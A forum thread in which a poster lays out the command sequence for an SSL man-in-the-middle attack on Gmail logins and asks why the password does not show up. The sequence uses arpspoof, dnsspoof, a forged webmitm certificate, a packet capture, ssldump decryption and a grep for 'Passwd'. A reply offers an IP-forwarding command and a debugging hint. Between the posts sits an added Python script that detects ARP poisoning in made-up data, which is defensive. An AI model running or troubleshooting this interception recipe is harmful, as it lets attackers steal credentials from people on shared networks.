
How to decrypt SSL traffic using a MITM attack



http://www.hackerscenter.com/index.php?/Video/General/How-to-decrypt-SSL-encrypted-traffic-using-a-man-in-the-middle-attack-Auditor.html

I've followed this step by step and have not had any luck capturing my own password. What might I be doing wrong?

Commands I ran:

fragrouter -B1
arpspoof -t XX.XX.XX.XX XX.Router.IP.ADD
webmitm (made a cert)
dnsspoof
wireshark (and start recording everything)

On the victim machine, when I perform an nslookup on gmail, the IP address is from my local area network.

Secondly, on the victim machine, when I visit gmail.com over https, there is a warning about the fake certificate I issued using the attacker's rig.

Log in to my own account.

Switch back to the attacker's rig.

Save the captured packets.

Then I ran: ssldump -r capture -k webmitm.crt -d > out

Lastly: cat out | grep 'Passwd'

I get nothing. I looked through the out file and it seems like I am recording the traffic for gmail.com, but I can't see my own password. Any ideas?

Thank you guys for any words of wisdom.
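From the victim's side, the arpspoof step in the post above leaves a clear trace: the gateway IP suddenly answers from a second MAC. The script below is an added example, not code from this thread; it runs over a constructed list of ARP replies (all addresses made up) and flags exactly that pattern.

```python
# Added example (not from the thread): flag the ARP-cache poisoning that
# "arpspoof -t <victim> <gateway>" causes, as seen from the victim's side.
# Input records are constructed: (timestamp, sender_ip, sender_mac) taken
# from ARP "is-at" replies. All addresses below are made up.
from collections import defaultdict

# Constructed sample: the gateway 192.168.1.1 legitimately lives at ...:01;
# from t=30 on, a second host (...:99) starts claiming to be the gateway.
ARP_REPLIES = [
    (10.0, "192.168.1.1",  "aa:bb:cc:00:00:01"),
    (11.5, "192.168.1.7",  "aa:bb:cc:00:00:07"),
    (30.0, "192.168.1.1",  "aa:bb:cc:00:00:99"),   # poisoned reply
    (31.0, "192.168.1.1",  "aa:bb:cc:00:00:99"),
    (32.0, "192.168.1.1",  "aa:bb:cc:00:00:01"),   # real gateway answers again
    (33.0, "192.168.1.20", "aa:bb:cc:00:00:99"),   # same MAC claims another IP
]


def find_arp_conflicts(replies):
    """Return {ip: sorted MACs} for every IP claimed by more than one MAC.
    A gateway IP flipping between two MACs is the classic arpspoof signature."""
    seen = defaultdict(set)
    for _, ip, mac in replies:
        seen[ip].add(mac.lower())
    return {ip: sorted(macs) for ip, macs in seen.items() if len(macs) > 1}


def find_mac_claiming_many(replies, limit=1):
    """Return {mac: sorted IPs} for MACs answering for more than `limit` IPs.
    One MAC posing as the gateway and as other hosts is a second signature."""
    claims = defaultdict(set)
    for _, ip, mac in replies:
        claims[mac.lower()].add(ip)
    return {mac: sorted(ips) for mac, ips in claims.items() if len(ips) > limit}


if __name__ == "__main__":
    for ip, macs in find_arp_conflicts(ARP_REPLIES).items():
        print(f"ALERT: {ip} claimed by multiple MACs: {macs}")
    for mac, ips in find_mac_claiming_many(ARP_REPLIES).items():
        print(f"ALERT: {mac} answers for several IPs: {ips}")
```

On a real host the same records can be pulled from a packet capture filtered to ARP replies, or from periodic snapshots of the ARP cache.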



more than one way to skin a cat

no need for fragrouter: echo "1" > /proc/sys/net/ipv4/ip_forward

and remember

Lastly: cat out | grep 'Passwd'

Linux is case sensitive, and read the manual:

man grep